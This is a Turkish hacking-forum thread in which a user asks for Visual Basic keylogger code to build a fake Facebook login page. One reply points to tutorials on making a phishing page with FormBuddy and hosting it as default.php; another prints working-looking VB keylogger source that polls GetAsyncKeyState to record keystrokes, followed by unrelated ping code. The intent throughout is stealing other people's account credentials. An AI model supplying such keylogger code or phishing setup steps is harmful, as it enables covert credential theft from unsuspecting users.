THT DUYURU

THT Yardım Merkezi THT Yardım Merkezi bölümünden; teknoloji ve bilişim ile ilgili her konu için yardım isteyebilirsiniz.

Seçenekler

vb 2008 için keylogger kodları ?

emrecanix - ait Kullanıcı Resmi (Avatar)
Uzman Üye
Üyelik tarihi:
07/2012
Nereden:
İstanbul
Mesajlar:
1.363
Konular:
293
Teşekkür (Etti):
45
Teşekkür (Aldı):
128
Ticaret:
(0) %
4
276
23-11-2012 17:13
#1
arkadaşlar vb 2008 de fake facebook hazırlıyorum keylogger kodlarını verirmisinz?
--------------------- Meraklanma malı sıfırladık babacım
ramiz_7 - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
07/2009
Mesajlar:
194
Konular:
43
Teşekkür (Etti):
7
Teşekkür (Aldı):
11
Ticaret:
(0) %
25-11-2012 14:10
#2
İlk 1. ye girin forumbuddy facebook fake yapmak için sonra bedava domain -host almak sonra hosta dosya aktarmak.

1.Face Hesabı Nasıl Hacklenir FormBuddy Fake Resimli Anlatım - High Respect Undetecter Team


2.Bedava Domain-Host Almak - YouTube


3.Hosta dosya aktarmak - YouTube

Hosta dosyayı aktarmadan(yüklemeden) önce yüklicemiz dosyanın adını default.php yapın sonra atınTeşekkürü fazla görmeyin ++++++++rip
ramiz_7 - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
07/2009
Mesajlar:
194
Konular:
43
Teşekkür (Etti):
7
Teşekkür (Aldı):
11
Ticaret:
(0) %
25-11-2012 14:12
#3VB Keylogger Kodları

Kod:
Componentler: text1 Module: Public Const DT_CENTER = &H1 Public Const DT_WORDBREAK = &H10 Type RECT Left As Long Top As Long Right As Long Bottom As Long End Type Declare Function DrawTextEx Lib "user32" Alias "DrawTextExA" (ByVal hDC As Long, ByVal lpsz As String, ByVal n As Long, lpRect As RECT, ByVal un As Long, ByVal lpDrawTextParams As Any) As Long Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer Declare Function SetRect Lib "user32" (lpRect As RECT, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long Global Cnt As Long, sSave As String, sOld As String, Ret As String Dim Tel As Long Function GetPressedKey() As String For Cnt = 32 To 128 &l039;Get the keystate of a specified key If GetAsyncKeyState(Cnt) <> 0 Then GetPressedKey = Chr&l036;(Cnt) Exit For End If Next Cnt End Function Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) Ret = GetPressedKey If Ret <> sOld Then sOld = Ret Form1.Text1.Text = Form1.Text1.Text & Ret End If End Sub Form_Load: SetTimer Me.hwnd, 0, 1, AddressOf TimerProc Form_Unload: KillTimer Me.hwnd, 0 Ping Atma ve Veri Alma Componentler form1->frmmain text1->txtnumber text2->txtIP ext3->txtoutpu General: Option Explicit Const SYNCHRONIZE = &H100000 Const INFINITE = &HFFFF Const WAIT_OBJECT_0 = 0 Const WAIT_TIMEOUT = &H102 Private Declare Function SendMessage Lib "User32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Form_Load: Dim ShellX As String Dim lPid As Long Dim lHnd As Long Dim lRet As Long Dim VarX As String frmMain.MousePointer = 11 If txtIP.Text <> "" Then DoEvents ShellX = Shell("command.com /c ping -n " & txtNumber.Text & " " & txtIP.Text & " > C:&l92;log.txt", vbHide) lPid = ShellX If lPid <> 0 Then lHnd = OpenProcess(SYNCHRONIZE, 0, lPid) If lHnd <> 0 Then lRet = WaitForSingleObject(lHnd, INFINITE) CloseHandle (lHnd) End If Beep frmMain.MousePointer = 0 Open "C:&l92;log.txt" For Input As l1 txtOutPut.Text = Input(LOF(1), 1) Close l1 End If Else frmMain.MousePointer = 0 VarX = MsgBox("You have not entered an ip address or the number of times you want to ping.", vbCritical, "Error has occured") End If[/i]
emrecanix - ait Kullanıcı Resmi (Avatar)
Uzman Üye
Üyelik tarihi:
07/2012
Nereden:
İstanbul
Mesajlar:
1.363
Konular:
293
Teşekkür (Etti):
45
Teşekkür (Aldı):
128
Ticaret:
(0) %
25-11-2012 16:12
#4
ben bundan bahsetmiyodum ki fake facebook programından bahsediyodum
--------------------- Meraklanma malı sıfırladık babacım
emrecanix - ait Kullanıcı Resmi (Avatar)
Uzman Üye
Üyelik tarihi:
07/2012
Nereden:
İstanbul
Mesajlar:
1.363
Konular:
293
Teşekkür (Etti):
45
Teşekkür (Aldı):
128
Ticaret:
(0) %
25-11-2012 16:20
#5
buldum konu kilitlenebilir
--------------------- Meraklanma malı sıfırladık babacım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler